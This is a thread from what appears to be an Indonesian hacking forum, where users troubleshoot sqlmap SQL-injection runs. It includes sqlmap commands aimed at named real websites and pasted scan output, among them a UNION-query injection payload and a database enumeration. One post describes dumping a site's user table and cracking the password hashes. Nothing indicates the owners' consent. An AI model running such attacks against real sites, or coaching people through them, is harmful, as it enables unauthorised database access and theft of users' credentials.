SQLi Sqlmap.py
#31
udah taro target

step 1
|
step 2
|
step 3
|
step 4

dan akhirnya kena penyakit step...

ehehehehehe
Hidup Harus Di Bawa Happy..!!!

#32
nice share om,
ane bookmark dlo dah Cool

#33
ok dah..
Hidup Harus Di Bawa Happy..!!!

#34
blom ketemu ya bugnya???
Hidup Harus Di Bawa Happy..!!!

#35
google dork kendalanya di mana bro ?

#36
kk mau tanya nih. saat baru pertama mulai kenapa seperti ini yah
root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs
Traceback (most recent call last):
File "sqlmap.py", line 27, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module>
from lib.controller.action import action
File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module>
from plugins.generic.enumeration import Enumeration as GenericEnumeration
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, in <module>
from lib.core.common import BigArray
ImportError: cannot import name BigArray

#37
kk gimana klo databesNya gak ada muncul?, contohnya pas kita
--------------------------------
# python sqlmap.py -u http://www.side.com/index.php?id=7 --dbs
--------------------------------

databasenya gak ada muncul, kaya "admin" dll. di terminal aku cuma muncul gini :
---------------------------------
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:42:54

[03:42:55] [INFO] using '/pentest/database/sqlmap/output/side.com/session' as session file
[03:42:56] [INFO] testing connection to the target url
[03:43:05] [INFO] testing if the url is stable, wait a few seconds
[03:43:07] [INFO] url is stable
[03:43:07] [INFO] testing if GET parameter 'id' is dynamic
[03:43:08] [INFO] confirming that GET parameter 'id' is dynamic
[03:43:08] [INFO] GET parameter 'id' is dynamic
^C
[03:43:08] [ERROR] user aborted

[*] shutting down at: 03:43:08

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.side.com/index.php?id=7 --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:43:17

[03:43:17] [INFO] using '/pentest/database/sqlmap/output/www.side.com/session' as session file
[03:43:18] [INFO] testing connection to the target url
[03:43:20] [INFO] testing if the url is stable, wait a few seconds
[03:43:24] [INFO] url is stable
[03:43:24] [INFO] testing if GET parameter 'id' is dynamic
[03:43:25] [INFO] confirming that GET parameter 'id' is dynamic
[03:43:26] [INFO] GET parameter 'id' is dynamic
[03:43:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[03:43:28] [INFO] testing sql injection on GET parameter 'id'
[03:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:43:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[03:44:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[03:44:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[03:44:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[03:44:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:44:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[03:44:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[03:44:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:44:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[03:44:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[03:45:04] [INFO] testing 'Oracle AND time-based blind'
[03:45:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[03:46:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[03:46:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[03:48:30] [WARNING] GET parameter 'id' is not injectable
[03:48:30] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

--------------------------------

seharusnya klo benaran ada bug harusnya muncul kaya gini kan ...? (contoh)
--------------------------------
--------------------------------
Place: GET
Parameter: id
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=11 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,102,109,100,58),CHAR(70,90,99,74,104,99,88,71,102,102),CHAR(58,111,105,97,58)), NULL#
---

[02:50:29] [INFO] manual usage of GET payloads requires url encoding
[02:50:29] [INFO] testing MySQL
[02:50:30] [INFO] confirming MySQL
[02:50:34] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[02:50:34] [INFO] fetching database names
[02:50:42] [INFO] the SQL query used returns 2 entries
[02:50:50] [INFO] retrieved: "sango"
[02:51:00] [INFO] retrieved: "information_schema"
available databases [2]:
[*] information_schema
[*] xxxxxxxx
---------------------------

itu berarti web tersebut gak ada bugNya atau gimana kk....??, aku masih samar samar, kk ada saran aku harus belajar apa dlu...?

#38
(12-05-2011, 11:25 PM)OWL#9 Wrote: kk mau tanya nih. saat baru pertama mulai kenapa seperti ini yah
root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs
Traceback (most recent call last):
File "sqlmap.py", line 27, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module>
from lib.controller.action import action
File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module>
from plugins.generic.enumeration import Enumeration as GenericEnumeration
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, in <module>
from lib.core.common import BigArray
ImportError: cannot import name BigArray

Setau ane ni filenya ga ada kalo nda error... coba dah mending diUpdate aja.... bisa liat disini dah

Code:
http://forum.indonesianbacktrack.or.id/showthread.php?tid=1572

Angel

Every Second, Every Minutes, Every Hours, Every Days Its Never End

#39
Om, ane udh berhasil nge-dump table nya, dapat username ama password, tapi password nya di encrypt, ane coba decrypt pake md5 decrypted gk bisa T_T, gmn cara nya om, buat nge decrypt password nya?
(01-26-2012, 06:36 PM)shin_orochi Wrote: Om, ane udh berhasil nge-dump table nya, dapat username ama password, tapi password nya di encrypt, ane coba decrypt pake md5 decrypted gk bisa T_T, gmn cara nya om, buat nge decrypt password nya?

eh udh nemu ding Big Grin, anyway, makasih om tutorialnya, it's work!

#40
Maaf nih mau nanya soal Sqlmap, kalo semisal udah ketemu semua tabel - tabel nya terus kita pengen download database atau isi dari tabel2 tersebut apa bisa tanpa harus mengetikkan perintah --dump ?

terimakasih sebelum nya






Users browsing this thread: 1 Guest(s)